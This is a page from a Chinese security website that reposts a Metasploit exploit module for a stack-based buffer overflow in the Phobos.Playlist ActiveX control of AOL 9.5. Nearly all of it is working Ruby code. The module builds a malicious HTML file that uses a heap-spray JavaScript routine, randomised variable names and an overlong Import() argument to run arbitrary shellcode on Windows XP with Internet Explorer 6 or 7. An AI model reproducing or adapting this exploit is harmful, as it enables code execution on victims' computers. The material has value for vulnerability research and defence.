首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AOL 9.5 Phobos.Playlist 'Import()' Buffer Overflow Exploit (Meta)
来源:http://www.rec-sec.com 作者:Trancer 发布时间:2010-01-26  

##
# aol_phobos_bof.rb
#
# AOL 9.5 Phobos.Playlist 'Import()' Stack-based Buffer Overflow exploit for the Metasploit Framework
#
# Tested successfully on the following platforms:
#  - AOL 9.5 (Revision 4337.155) on Internet Explorer 7, Windows XP SP3
#
# Phobos.dll version tested:
# File Version: 9.5.0.1
# ClassID: A105BD70-BF56-4D10-BC91-41C88321F47C
# RegKey Safe for Script: False
# RegKey Safe for Init: False
# Implements IObjectSafety: False
# KillBitSet: False
#
# Due to the safe for initialization and safe for scripting settings of this ActiveX control,
# exploitation is possible only from Local Machine Zone, which means the victim must run the
# generated exploit file locally.
#
# Trancer
# http://www.rec-sec.com
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = AverageRanking

 include Msf::Exploit::FILEFORMAT

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow',
   'Description'    => %q{
    This module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5.
    By setting an overly long value to 'Import()', an attacker can overrun a buffer
    and execute arbitrary code.
   },
   'License'        => MSF_LICENSE,
   'Author'         => [
      'Trancer <mtrancer[at]gmail.com>'
      ],
   'Version'        => '$Revision:$',
   'References'     =>
    [
     [ 'URL', 'http://www.exploit-db.com/exploits/11204' ],
     [ 'URL', 'http://www.rec-sec.com/2010/01/25/aol-playlist-class-buffer-overflow/' ],
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
    },
   'Payload'        =>
    {
     'Space'         => 1024,
     'BadChars'      => "\x00\x09\x0a\x0d'\\", 
     'StackAdjustment' => -3500,
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C, 'Offset' => 1000 } ] 
    ],
   'DisclosureDate' => 'Jan 20 2010',
   'DefaultTarget'  => 0))

   register_options(
    [
     OptString.new('FILENAME',   [ false, 'The file name.',  'msf.html']),
    ], self.class)
 end

 def exploit

  # Encode the shellcode
  shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

  # Setup exploit buffers
  nops    = Rex::Text.to_unescape([target.ret].pack('V'))
  ret     = Rex::Text.uri_encode([target.ret].pack('L'))
  blocksize = 0x40000
  fillto    = 500
  offset    = target['Offset']
  
  # Randomize the javascript variable names
  phobos       = rand_text_alpha(rand(100) + 1)
  j_shellcode  = rand_text_alpha(rand(100) + 1)
  j_nops       = rand_text_alpha(rand(100) + 1)
  j_ret        = rand_text_alpha(rand(100) + 1)
  j_headersize = rand_text_alpha(rand(100) + 1)
  j_slackspace = rand_text_alpha(rand(100) + 1)
  j_fillblock  = rand_text_alpha(rand(100) + 1)
  j_block      = rand_text_alpha(rand(100) + 1)
  j_memory     = rand_text_alpha(rand(100) + 1)
  j_counter    = rand_text_alpha(rand(30) + 2)
  j_bla        = rand_text_alpha(rand(8) + 4)

  html = %Q|<html>
<object classid='clsid:A105BD70-BF56-4D10-BC91-41C88321F47C' id='#{phobos}'></object>
<script>
#{j_shellcode}=unescape('#{shellcode}');
#{j_nops}=unescape('#{nops}');
#{j_headersize}=20;
#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
#{j_memory}=new Array();
for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};

var #{j_ret}='';
for(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ret}');
#{phobos}.Import(#{j_ret},'#{j_bla}','True','True');
</script>
</html>|

  print_status("Creating '#{datastore['FILENAME']}' file ...")

  file_create(html)
 end

end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Winamp v5.572 whatsnew.txt Loc
·Status2k Remote Add Admin Expl
·Winamp v5.572 whatsnew.txt Sta
·P2GChinchilla HTTP Server vers
·BoastMachine version 3.1 suffe
·Status2k remote add administra
·IE浏览器wshom.ocx ActiveX控件
·AIC Audio Player 1.4.1.587 Loc
·PHP 5.2.11/5.3.0 的多个漏洞
·South River Technologies WebDr
·PHPBB 3.0 0day
·KOL WaveIOX 1.04 (.wav) Local
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved